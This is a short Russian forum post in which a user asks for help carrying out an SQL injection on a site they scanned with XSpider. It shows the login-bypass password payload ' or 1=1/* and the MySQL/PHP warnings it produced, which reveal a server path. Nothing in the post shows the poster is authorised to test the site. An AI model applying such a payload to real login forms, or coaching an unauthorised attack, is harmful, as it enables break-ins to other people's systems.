Дата регистрации: 09.06.2002
Сообщения: 758
Место нахождения: Москва
Флаг страны:
SQL-инъекция
Нужно провести sql-инъекцию, но не хватает знаний.... помогите.
Просканил сайт XSpider'om. Он нашел 21 серьезную уязвимость на SQL-инъекцию.
При вводе логина и пароля ввожу следующее:
login: admin
pwd: ' or 1=1/*
Получаю:
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in <скрыто в своих соображениях>\sessions.php3 on line 74
Warning: Cannot modify header information - headers already sent by (output started at c:\DGEC\courses\include\sessions.php3:74) in <скрыто в своих соображениях>\sessions.php3 on line 148